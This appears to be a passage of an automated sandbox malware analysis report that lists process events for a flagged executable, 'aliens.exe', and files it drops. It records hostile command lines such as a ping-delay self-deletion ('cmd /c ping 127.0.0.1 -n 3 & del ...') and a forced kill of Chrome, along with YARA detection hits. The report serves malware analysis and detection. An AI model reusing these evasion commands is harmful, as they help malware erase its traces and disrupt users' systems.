Path: C:\Program Files (x86)\71eza90awf48\aliens.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Imagebase: 0x400000
File size: 506545472 bytes
MD5 hash: 87698F069716708B6743A580B1D0D0CC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

                                                                                                                                                  General

Start time: 08:41:52
Start date: 05/12/2020
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase: 0x1180000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

Start time: 08:41:54
Start date: 05/12/2020
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Imagebase: 0x1180000
File size: 59904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

Start time: 08:42:43
Start date: 05/12/2020
Path: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Imagebase: 0x400000
File size: 506545472 bytes
MD5 hash: 87698F069716708B6743A580B1D0D0CC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, Author: Florian Roth
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

                                                                                                                                                  General

Start time: 08:43:27
Start date: 05/12/2020
Path: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Imagebase: 0x400000
File size: 506545472 bytes
MD5 hash: 87698F069716708B6743A580B1D0D0CC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: low

                                                                                                                                                  General

                                                                                                                                                  Start time:08:42:52
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:08
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                  File size:18944 bytes
                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:35
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:73160 bytes
                                                                                                                                                  MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:37
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:38
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis
